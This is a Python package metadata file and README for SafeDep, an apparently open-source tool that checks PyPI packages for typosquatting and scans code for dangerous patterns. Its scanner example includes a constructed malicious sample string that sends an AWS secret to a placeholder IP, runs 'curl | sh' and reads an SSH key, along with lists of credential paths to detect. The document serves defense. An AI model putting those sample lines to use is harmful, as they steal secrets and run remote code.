Metadata-Version: 2.4
Name: safedep
Version: 0.1.0
Summary: Protect your dependencies from supply chain attacks.
Author-email: Marcio Reck <marcio@fazmercado.com>
Classifier: Programming Language :: Python :: 3
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
Requires-Python: >=3.9
Description-Content-Type: text/markdown
Requires-Dist: requests
Requires-Dist: click
Requires-Dist: rich

# 🛡️ SafeDep: Your Dependency Guardian

**SafeDep** is an open-source tool designed to protect developers from supply chain attacks. It analyzes packages and their dependencies for malicious behavior, data exfiltration, and hidden vulnerabilities before you install them.

> "Don't just scan for known vulnerabilities. Detect suspicious behavior."

---

## ✨ Why SafeDep?

The package ecosystems (PyPI, npm, Cargo) are under constant attack from *typosquatting*, *dependency confusion*, and *trojanized packages*. SafeDep goes beyond standard vulnerability databases (CVEs) by looking at how the code **behaves**: static analysis and package metadata today, with sandboxed dynamic analysis planned (see the roadmap below).

### Key Features
- 🏷️ **Typosquatting Protection** (implemented): checks whether a package name is dangerously similar to a popular one.
- 🔑 **Secret Leak Detection**: flags packages that attempt to read your environment variables or `.env` files, where API keys usually live.
- 🔍 **Pre-install Sandbox** (planned, Phase 2): runs installation scripts in an isolated environment and records what they try to access.
- 📡 **Network Monitor** (planned, with the Phase 2 sandbox): alerts you when a "text processing" package tries to reach unknown hosts during installation.

---

## 🛠️ Getting Started

To use **SafeDep** locally, clone the repository and install it in editable mode:

```bash
# create a virtual environment
python3 -m venv venv
source venv/bin/activate

# Install dependencies
pip install -r requirements.txt

# Install SafeDep in editable mode
pip install -e .
```

## 🚀 How to Use (CLI)

SafeDep provides two main commands:

### 1. Check a package before installing
Looks up a package on PyPI and reports typosquatting risk (name similarity to popular packages) and reputation signals (project creation date, author history). The package is not installed or executed.
```bash
safedep check <package_name>
```
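The name-similarity and reputation heuristics behind a check like this, as an added example that is not SafeDep's own code: PEP 503 name normalization, a look-alike character fold, edit distance with transpositions, and prefix/suffix variants, plus age and release-count flags computed from a dict shaped like the PyPI JSON API response. The popular-package list, the thresholds and all function names are assumptions for illustration; the sample response is constructed.

```python
"""Added example, not SafeDep's own code: the name-similarity and reputation
heuristics that `safedep check` describes. The popular-package list, thresholds
and function names are assumptions made for illustration."""
import re
import unicodedata
from datetime import datetime, timedelta, timezone
from typing import List, Tuple

# Constructed stand-in for a "most downloaded PyPI packages" list.
POPULAR_PACKAGES = ["requests", "urllib3", "numpy", "pandas", "python-dateutil",
                    "cryptography", "setuptools", "pyyaml", "boto3", "click"]

def normalize(name: str) -> str:
    """PEP 503 normalization: lowercase, runs of '-', '_' and '.' become one '-'.
    pip treats `Python_DateUtil` and `python-dateutil` as the same project."""
    return re.sub(r"[-_.]+", "-", name).lower()

def confusable_fold(name: str) -> str:
    """Fold characters typosquatters swap for look-alikes (0/o, 1/l/i, 5/s, 3/e,
    rn/m, vv/w). NFKC collapses full-width and other compatibility forms."""
    folded = unicodedata.normalize("NFKC", name)
    folded = folded.translate(str.maketrans({"0": "o", "1": "l", "i": "l",
                                             "5": "s", "3": "e"}))
    return folded.replace("rn", "m").replace("vv", "w")

def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: Levenshtein plus an adjacent
    transposition as one edit, so 'reqeusts' is 1 edit from 'requests'."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]

def strip_affixes(name: str) -> str:
    """Drop 'python-'/'py-' prefixes and '-python'/'-py' suffixes, so `dateutil`
    is compared against the genuine `python-dateutil` and vice versa."""
    for pre in ("python-", "py-"):
        if name.startswith(pre) and len(name) > len(pre):
            name = name[len(pre):]
    for suf in ("-python", "-py"):
        if name.endswith(suf) and len(name) > len(suf):
            name = name[:-len(suf)]
    return name

def typosquat_candidates(name: str, popular: List[str] = POPULAR_PACKAGES,
                         max_edits: int = 1) -> List[Tuple[str, str]]:
    """Return (popular_package, reason) pairs the requested name is suspiciously
    close to. An exact match after normalization is the genuine package."""
    target = normalize(name)
    normalized = {normalize(p): p for p in popular}
    if target in normalized:
        return []
    hits = []
    for pop_n, pop in normalized.items():
        if confusable_fold(target) == confusable_fold(pop_n):
            hits.append((pop, "confusable characters"))
        elif osa_distance(target, pop_n) <= max_edits:
            hits.append((pop, f"edit distance <= {max_edits}"))
        elif strip_affixes(target) == strip_affixes(pop_n):
            hits.append((pop, "affix variant"))
    return hits

def reputation_flags(pkg: dict, now: datetime) -> List[str]:
    """Heuristics over a dict shaped like the PyPI JSON API response
    (https://pypi.org/pypi/<name>/json). Thresholds are assumptions."""
    uploads = [datetime.fromisoformat(f["upload_time_iso_8601"].replace("Z", "+00:00"))
               for files in pkg["releases"].values() for f in files]
    flags = []
    if not uploads or now - min(uploads) < timedelta(days=30):
        flags.append("first upload less than 30 days ago")
    if len(pkg["releases"]) <= 1:
        flags.append("single release")
    if not (pkg["info"].get("project_urls") or pkg["info"].get("home_page")):
        flags.append("no project URL")
    return flags

# Constructed sample response for a freshly registered look-alike package.
SAMPLE_PKG = {
    "info": {"name": "requets", "project_urls": None, "home_page": ""},
    "releases": {"0.0.1": [{"upload_time_iso_8601": "2024-03-01T10:00:00.000000Z"}]},
}

if __name__ == "__main__":
    print(typosquat_candidates("requets"))       # [('requests', 'edit distance <= 1')]
    print(reputation_flags(SAMPLE_PKG, datetime(2024, 3, 10, tzinfo=timezone.utc)))
```

Normalizing first matters: without it `Requests` and `requests` look like two different names, and a squatter can hide a real edit behind a spurious one. The transposition rule catches the most common keyboard slip (`reqeusts`), the affix rule catches `python-`/`py-` variants in both directions, and the reputation flags are only signals: a brand-new package with one release is not malicious by itself, but one that also collides with a top package deserves a manual look.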

### 2. Scan a local directory
Parses the Python files under the path and flags dangerous code patterns (e.g., `eval`, `os.system`). Findings are leads for manual review, not verdicts: legitimate packages also shell out, so a hit means "read this", not "malware".
```bash
safedep scan <path_to_directory>
```
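The kind of static detection a scan like this performs, as an added example that is not SafeDep's own scanner: it walks the module's AST rather than grepping, so import aliases (`import subprocess as sp`, `from os import system as s`) still resolve to the dangerous call, `exec` fed directly from a decoder is flagged as an obfuscated payload, `shell=True` is recognised, and reads of environment variables, network endpoints and credential files are reported. The rule names, the decoder and path lists, and the malicious sample module are all constructed for illustration; the IP address is from a documentation range.

```python
"""Added example, not SafeDep's own scanner: an AST-based detector for the kinds
of patterns `safedep scan` describes. Rule names and path lists are assumptions."""
import ast
import os
from typing import Dict, List, Optional, Tuple

# Decoders that, when fed straight into eval/exec, indicate an obfuscated payload.
DECODERS = {"base64.b64decode", "base64.b32decode", "base64.b85decode",
            "bytes.fromhex", "codecs.decode", "zlib.decompress"}
# Module prefixes whose calls mean the code talks to the network.
NETWORK_PREFIXES = ("socket.", "urllib.request.", "requests.", "http.client.")
# Credential stores matched by path fragment; `.env` is matched by exact basename
# below so that a file called 'environment.py' is not a false positive.
SENSITIVE_PATHS = (".ssh/", ".aws/credentials", ".netrc", ".npmrc", ".pypirc", ".git-credentials")

class Scanner(ast.NodeVisitor):
    """Resolves import aliases so `import os as o; o.system()` still maps to os.system."""

    def __init__(self) -> None:
        self.aliases: Dict[str, str] = {}
        self.findings: List[Tuple[int, str]] = []

    def report(self, node: ast.AST, reason: str) -> None:
        self.findings.append((node.lineno, reason))

    def visit_Import(self, node: ast.Import) -> None:
        for a in node.names:
            if a.asname:
                self.aliases[a.asname] = a.name
            else:  # `import os.path` binds the top-level name `os`
                self.aliases[a.name.split(".")[0]] = a.name.split(".")[0]

    def visit_ImportFrom(self, node: ast.ImportFrom) -> None:
        if node.module:  # relative imports (`from . import x`) have no module
            for a in node.names:
                self.aliases[a.asname or a.name] = f"{node.module}.{a.name}"

    def qualname(self, node: ast.AST) -> Optional[str]:
        """Dotted name of a Name/Attribute chain with aliases resolved, else None."""
        if isinstance(node, ast.Name):
            return self.aliases.get(node.id, node.id)
        if isinstance(node, ast.Attribute):
            base = self.qualname(node.value)
            return f"{base}.{node.attr}" if base else None
        return None

    def visit_Subscript(self, node: ast.Subscript) -> None:
        if self.qualname(node.value) == "os.environ":
            self.report(node, "environment variable access")
        self.generic_visit(node)

    def visit_Call(self, node: ast.Call) -> None:
        name = (self.qualname(node.func) or "").removeprefix("builtins.")
        if name in ("eval", "exec"):
            payload = any(self.qualname(c.func) in DECODERS for c in ast.walk(node)
                          if isinstance(c, ast.Call) and c is not node)
            self.report(node, "execution of decoded/obfuscated payload" if payload
                        else "dynamic code execution")
        elif name in ("os.system", "os.popen"):
            self.report(node, "shell command execution")
        elif name.startswith("subprocess."):
            shell = any(k.arg == "shell" and isinstance(k.value, ast.Constant)
                        and k.value.value is True for k in node.keywords)
            self.report(node, "subprocess execution" + (" (shell=True)" if shell else ""))
        elif name in ("os.getenv", "os.environ.get"):
            self.report(node, "environment variable access")
        elif name.startswith(NETWORK_PREFIXES):
            self.report(node, "network access")
        elif name == "open":
            strings = [c.value for a in node.args for c in ast.walk(a)
                       if isinstance(c, ast.Constant) and isinstance(c.value, str)]
            if any(os.path.basename(s) == ".env" or any(p in s for p in SENSITIVE_PATHS)
                   for s in strings):
                self.report(node, "reads credential file")
        self.generic_visit(node)

def scan_source(src: str, filename: str = "<string>") -> List[Tuple[int, str]]:
    """Parse one Python source and return (line, reason) findings in line order."""
    scanner = Scanner()
    scanner.visit(ast.parse(src, filename))
    return sorted(scanner.findings)

# Constructed sample of a malicious install hook (198.51.100.0/24 is a documentation range).
SAMPLE = '''
import os, base64
import subprocess as sp
from urllib.request import urlopen
version = "1.0"  # benign, not flagged
token = os.environ["AWS_SECRET_ACCESS_KEY"]
urlopen("http://198.51.100.7/c", data=token.encode())
exec(base64.b64decode("cHJpbnQoJ2hpJyk="))
sp.run("curl -s http://198.51.100.7/s | sh", shell=True)
with open(os.path.expanduser("~/.ssh/id_rsa")) as f:
    pass
'''

if __name__ == "__main__":
    for line, reason in scan_source(SAMPLE):
        print(f"line {line}: {reason}")
```

Run over a checkout, this would be applied to every `.py` file under the directory, `setup.py` first, since install-time hooks are where malicious code usually hides. The AST approach costs a parse per file but removes the two classic regex failures: aliased imports that hide the call name, and matches inside strings or comments. It still cannot see code built at runtime (`getattr(os, "sys" + "tem")`), which is exactly the gap the planned sandbox is meant to close.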

---

## 🗺️ Development Roadmap

### Phase 1: Foundation (MVP) - "The Scanner" ✅ (Implemented)
- ✅ Implementation of name similarity analysis (Anti-Typosquatting).
- ✅ Reputation verification (package creation date, author history).
- ✅ Static code scanner for dangerous functions.

### Phase 2: Intelligence (Beta) - "The Behavioralist" 🧠
- **Sandboxing**: integration with Docker/Podman to run `setup.py` in isolation and monitor its system calls (syscalls).
- **Multi-language Support**: adding npm (Node.js) and Cargo (Rust) alongside Python.
- **CI/CD Integration**: a GitHub Action that blocks PRs introducing suspicious dependencies.

### Phase 3: Community and Sustainability - "The Shield" 🛡️
- **SafeDep Hub**: a community-driven database of "audited and clean" packages.
- **Security Badges**: a system for repositories to display security trust seals.
- **Sponsorship Program**: launching the Sponsors program to maintain the heavy analysis infrastructure.

---

## 🤝 Contribute & Sponsor
This project is 100% free and community-focused. If you believe in a safer software ecosystem, consider becoming a contributor or sponsor:
- Give a ⭐ on GitHub
- Report bugs
- Become a sponsor: [GitHub Sponsors](https://github.com/sponsors/marcioreck) / [OpenCollective](https://opencollective.com/marcioreck)

Developed for those who prioritize security.
